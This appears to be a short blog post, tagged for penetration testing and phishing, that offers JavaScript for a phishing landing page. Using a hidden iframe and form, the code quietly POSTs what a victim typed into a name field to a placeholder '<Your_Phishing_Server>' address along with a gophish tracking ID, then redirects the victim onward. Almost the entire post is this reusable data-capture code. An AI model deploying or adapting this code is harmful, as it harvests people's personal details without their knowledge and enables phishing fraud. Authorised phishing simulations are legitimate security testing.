---
layout: post
title: "javascript cross-domain POST requests"
tags: pt phishing
---
for when you're trying to code a phishing landing page to post victim details but XHR just doesn't work, use iframe:

  
(ripped from [stackoverflow](https://stackoverflow.com/questions/298745/how-do-i-send-a-cross-domain-post-request-via-javascript))
    

note: uses gophish (therefore RId)
```js
function clkSubmit2() {
	//var url = '/?rid={{.RId}}'; //was for xhr
	//var params = 'username=' + document.getElementById("ctl00_ctl40_g_b8eb2a6c_91a2_41cc_9ee8_9c3f709f0b3a_ctl00_displayPanel_tbIndividualName").value; //was for xhr
		
	var iframe = document.createElement("iframe");
	var uniqueString = "CHANGE_THIS_TO_SOME_UNIQUE_STRING";
  	document.body.appendChild(iframe);
	iframe.style.display = "none";
	iframe.contentWindow.name = uniqueString;
	//alert(uniqueString);
	// construct a form with hidden inputs, targeting the iframe
	var form = document.createElement("form");
	form.target = uniqueString;
	form.action = "http://<Your_Phishing_Server>/?rid={{.RId}}";
	form.method = "POST";

	// repeat for each parameter
	var input = document.createElement("input");
	input.type = "hidden";
	input.name = "name";
	input.value = document.getElementById("ctl00_ctl40_g_b8eb2a6c_91a2_41cc_9ee8_9c3f709f0b3a_ctl00_displayPanel_tbIndividualName").value;
	form.appendChild(input);
 			
	document.body.appendChild(form);
	form.submit();
	window.location.href="http://<Your_Final_Landing_Page>";
}
```
